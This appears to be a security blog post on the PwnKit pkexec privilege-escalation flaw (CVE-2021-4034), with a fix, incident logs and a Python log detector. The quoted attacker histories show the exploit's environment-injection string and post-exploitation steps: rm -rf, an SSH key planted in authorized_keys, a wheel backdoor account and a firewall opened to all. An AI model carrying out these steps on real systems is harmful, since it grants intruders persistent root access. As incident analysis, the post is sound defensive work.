Old news ↓
12-year-old Linux vulnerability lets attackers execute code as root, affecting every distribution
This vulnerability, CVE-2021-4034, lies in Linux's Polkit (formerly PolicyKit), which is why it has also been named PwnKit. Polkit is the component that manages system-wide permissions on Unix, Linux and similar OSes, letting ordinary-privilege processes interact with high-privilege ones. pkexec, a setuid program that is part of Polkit, lets a user run commands as root.
You can test for the vulnerability with the CVE-2021-4034 POC; it drops you straight into root via su.
Temporary workaround
chmod 0755 /usr/bin/pkexec
Permanent fix (or reinstall a newer Linux)
yum update polkit -y
PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034)
Disclosure timeline
- 2021-11-18: Advisory sent to secalert@redhat.
- 2022-01-11: Advisory and patch sent to distros@openwall.
- 2022-01-25: Coordinated Release Date (5:00 PM UTC).
If your host has been compromised, you may see the following ↓
A user called manager was created
more /var/log/secure
xxxxxxxxx sudoedit: pam_unix(sudo:auth): conversation failed
xxxxxxxxx sudoedit: pam_unix(sudo:auth): auth could not identify password for [xxxxxxxxx]
xxxxxxxxx sudo: xxxxxxxxx : user NOT in sudoers ; TTY=pts/0 ; PWD=/var/www/xxxxxxxxx ; USER=root ; COMMAND=sudoedit Y
xxxxxxxxx pkexec[5651]: xxxxxxxxx: The value for the SHELL variable was not found the /etc/shells file [USER=root] [TTY=/dev/pts/0] [CWD=/var/www/xxxxxxxxx/tmp/CVE-2021-4034] [COMMAND=GCONV_PATH=./pwnkit.so:. PATH=GCONV_PATH=. SHELL=/lol/i/do/not/exists CHARSET=PWNKIT GIO_USE_VFS=]
xxxxxxxxx su: pam_unix(su:session): session opened for user root by xxxxxxxxx(uid=0)
xxxxxxxxx sudo: root : TTY=pts/0 ; PWD=/var/www/xxxxxxxxx/tmp/CVE-2021-4034 ; USER=root ; COMMAND=/bin/bash
xxxxxxxxx useradd[5759]: new group: name=manager, GID=10611
xxxxxxxxx useradd[5759]: new user: name=manager, UID=10611, GID=10611, home=/home/manager, shell=/bin/bash
xxxxxxxxx usermod[5764]: add 'manager' to group 'wheel'
xxxxxxxxx usermod[5764]: add 'manager' to shadow group 'wheel'
xxxxxxxxx passwd: pam_unix(passwd:chauthtok): password changed for manager
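The two indicators in the excerpt above can be matched automatically: a pkexec entry whose logged COMMAND begins with environment assignments (GCONV_PATH=...) or carries the "SHELL variable was not found" message, followed by a new account being added to wheel. The Python detector below is an added example, not code from this post; its sample log lines are constructed to mirror the excerpt, with invented host and user names.

```python
import re

# Constructed sample modelled on the /var/log/secure excerpt above; host and user
# names are invented, the message formats are the ones pkexec/useradd/usermod emit.
SAMPLE_SECURE_LOG = """\
Jan 26 10:14:02 web1 sudo: webuser : user NOT in sudoers ; TTY=pts/0 ; PWD=/var/www/site ; USER=root ; COMMAND=sudoedit
Jan 26 10:14:30 web1 pkexec[5651]: webuser: The value for the SHELL variable was not found the /etc/shells file [USER=root] [TTY=/dev/pts/0] [CWD=/var/www/site/tmp/CVE-2021-4034] [COMMAND=GCONV_PATH=./pwnkit.so:. PATH=GCONV_PATH=. SHELL=/lol/i/do/not/exists CHARSET=PWNKIT GIO_USE_VFS=]
Jan 26 10:14:31 web1 su: pam_unix(su:session): session opened for user root by webuser(uid=0)
Jan 26 10:16:05 web1 useradd[5759]: new user: name=manager, UID=10611, GID=10611, home=/home/manager, shell=/bin/bash
Jan 26 10:16:06 web1 usermod[5764]: add 'manager' to group 'wheel'
Jan 26 11:00:00 web1 pkexec[6001]: alice: Executing command [USER=root] [TTY=/dev/pts/1] [CWD=/home/alice] [COMMAND=/usr/bin/systemctl restart httpd]
"""

SYSLOG_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ [\d:]+) (?P<host>\S+) (?P<prog>[^\[:]+)(?:\[(?P<pid>\d+)\])?: (?P<msg>.*)$")
PKEXEC_CMD_RE = re.compile(r"\[COMMAND=(?P<cmd>[^\]]*)\]")
# pkexec runs its target with a sanitised environment, so a logged COMMAND that starts
# with VAR=value assignments means caller-controlled environment got through (CVE-2021-4034).
ENV_INJECT_RE = re.compile(r"^\w+=")
ADMIN_GROUPS = {"wheel", "sudo", "root"}

def scan(log_text):
    """Return (line_no, tag, detail) findings for syslog-style auth log text."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = SYSLOG_RE.match(line)
        if not m:
            continue
        prog, msg = m["prog"], m["msg"]
        if prog == "pkexec":
            cmd = PKEXEC_CMD_RE.search(msg)
            injected = bool(cmd and ENV_INJECT_RE.match(cmd["cmd"]))
            if injected or "SHELL variable was not found" in msg:
                findings.append((n, "pwnkit-exploit", cmd["cmd"] if cmd else msg))
        elif prog == "useradd":
            u = re.search(r"new user: name=([^,]+),", msg)
            if u:
                findings.append((n, "new-user", u[1]))
        elif prog == "usermod":
            g = re.search(r"add '([^']+)' to (?:shadow )?group '([^']+)'", msg)
            if g and g[2] in ADMIN_GROUPS:
                findings.append((n, "admin-group-add", f"{g[1]} -> {g[2]}"))
    return findings

def escalation_chain(findings):
    """True when a PwnKit indicator is later followed by account persistence."""
    first = next((n for n, tag, _ in findings if tag == "pwnkit-exploit"), None)
    return first is not None and any(
        n > first and tag in ("new-user", "admin-group-add") for n, tag, _ in findings)
```

On the sample, the benign pkexec line at the end produces no finding, while the exploit line plus the later useradd/usermod pair makes escalation_chain() return True.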
This user performed the privilege escalation
more /home/manager/.bash_history
sudo -s
cd /var/www/xxxxxxxxx
ls
sudo -s
cd ~
pwd
mkdir tmp
cd tmp/
tar -xf pkexec.tar
cd CVE-2021-4034/
./cve-2021-4034
exit
And after escalating, did a number of odd things
more /root/.bash_history
stty -echo nl lnext ^V ; export PS1=
export PS1=;echo; echo OHwnW9JnBC; echo $$ 0</dev/null; R=$?; echo Fv6xkfIdcP; echo $R; echo qM3u2r6gC3
export PS1=;echo; echo OoMNTdcsZ8; stat -c '%n %s %b %f %u %g %D %i %h %t %T %X %Y %Z %W %o' /proc/5681/exe 0</dev/null; R=$?; echo vt5FYTYuYt; echo $R; echo kmdHj4Qz5N
export PS1=;echo; echo PyKh84RjvN; readlink /proc/5681/exe 0</dev/null; R=$?; echo wUCNvL88Kc; echo $R; echo dlcIwyDDC1
export PS1=;echo; echo X52D2cVkpC; (id -ru;id -u;id -rg;id -g;id -G;) 0</dev/null; R=$?; echo l99t9ta2Fl; echo $R; echo GZe4WH0efg
stty sane ; stty rows 30 columns 120 ; export TERM='xterm-256color' ; export PS1='$(command printf "\[\033[01;31m\](remote)\[\033[0m\] \[\033[01;33m\]$(whoami)@$(hostname)\[\033[0m\]:\[\033[1;36m\]$PWD\[\033[0m\]\$ ")'
cd ../
rm -rf *
cd ~/.ssh/
echo ssh-rsa <public key removed> >> authorized_keys
adduser manager ;usermod -aG wheel manager ;passwd manager
cat /etc/ssh/sshd_config
stty -echo nl lnext ^V ; export PS1=
export PS1=;echo; echo wCROl9Fj0r; echo $$ 0</dev/null; R=$?; echo GflPaErpcn; echo $R; echo XGwHrNG2mo
export PS1=;echo; echo mvxy44Lvj1; stat -c '%n %s %b %f %u %g %D %i %h %t %T %X %Y %Z %W %o' /proc/5681/exe 0</dev/null; R=$?; echo tlOJnr47Pr; echo $R; echo oGEC4gPEzH
export PS1=;echo; echo Wqo4ZSKWue; readlink /proc/5681/exe 0</dev/null; R=$?; echo LVkPohakrr; echo $R; echo ftVS0U0Oi5
export PS1=;echo; echo AzsRDhdRfL; (id -ru;id -u;id -rg;id -g;id -G;) 0</dev/null; R=$?; echo ZsjDioQbF5; echo $R; echo JhUCDzYgG8
stty sane ; stty rows 30 columns 120 ; export TERM='xterm-256color' ; export PS1='$(command printf "\[\033[01;31m\](remote)\[\033[0m\] \[\033[01;33m\]$(whoami)@$(hostname)\[\033[0m\]:\[\033[1;36m\]$PWD\[\033[0m\]\$ ")'
cd /var/www/xxxxxxxxx
ls
systemctl status sshd
service sshd ststus
service sshd status
service sshd restart
sudo iptables -I INPUT 1 -p tcp -j ACCEPT
stty -echo nl lnext ^V ; export PS1=
export PS1=;echo; echo jRKw9yFasa; echo $$ 0</dev/null; R=$?; echo NZPIrVE43Y; echo $R; echo l1trwmUiai
export PS1=;echo; echo mG25rB5Ivl; stat -c '%n %s %b %f %u %g %D %i %h %t %T %X %Y %Z %W %o' /proc/5681/exe 0</dev/null; R=$?; echo NZUG6G5fw6; echo $R; echo slyZcBlViH
export PS1=;echo; echo UZ42oIvtdi; readlink /proc/5681/exe 0</dev/null; R=$?; echo vy7bhZQ4Ww; echo $R; echo ZWXBcMbYaV
export PS1=;echo; echo tXCXQW5UNe; (id -ru;id -u;id -rg;id -g;id -G;) 0</dev/null; R=$?; echo KnwQ5VvsLS; echo $R; echo jZzKcJeE1T
exit
sudo -s
su root
exit